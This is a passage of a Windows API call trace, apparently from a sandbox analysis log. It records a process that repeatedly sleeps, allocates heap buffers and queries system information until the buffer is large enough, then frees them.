[0292.396] Sleep (dwMilliseconds=0x110) [0292.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0292.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0292.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0292.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0292.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0292.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0292.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.411] Sleep (dwMilliseconds=0x110) [0292.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0292.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0292.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0292.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0292.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0292.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0292.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0292.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0292.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.426] Sleep (dwMilliseconds=0x110) [0292.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0292.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0292.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0292.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0292.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0292.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0292.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0292.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0292.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.443] Sleep (dwMilliseconds=0x110) [0292.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0292.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0292.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0292.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0292.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0292.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0292.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0292.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0292.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.457] Sleep (dwMilliseconds=0x110) [0292.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0292.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0292.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0292.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0292.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0292.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0292.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.471] Sleep (dwMilliseconds=0x110) [0292.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0292.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0292.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0292.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0292.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0292.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0292.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.488] Sleep (dwMilliseconds=0x110) [0292.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0292.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0292.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0292.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0292.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0292.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0292.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.503] Sleep (dwMilliseconds=0x110) [0292.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0292.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0292.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0292.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0292.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0292.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0292.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0292.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0292.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.517] Sleep (dwMilliseconds=0x110) [0292.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0292.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0292.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0292.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0292.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0292.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0292.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0292.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0292.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.531] Sleep (dwMilliseconds=0x110) [0292.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0292.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0292.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0292.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0292.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0292.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0292.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0292.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.585] Sleep (dwMilliseconds=0x110) [0292.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0292.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0292.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0292.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0292.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0292.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0292.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0292.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0292.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.598] Sleep (dwMilliseconds=0x110) [0292.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0292.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0292.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0292.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0292.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0292.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0292.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.614] Sleep (dwMilliseconds=0x110) [0292.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0292.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0292.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0292.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0292.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.630] Sleep (dwMilliseconds=0x110) [0292.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0292.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0292.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0292.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0292.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0292.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0292.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.649] RtlAllocateHeap 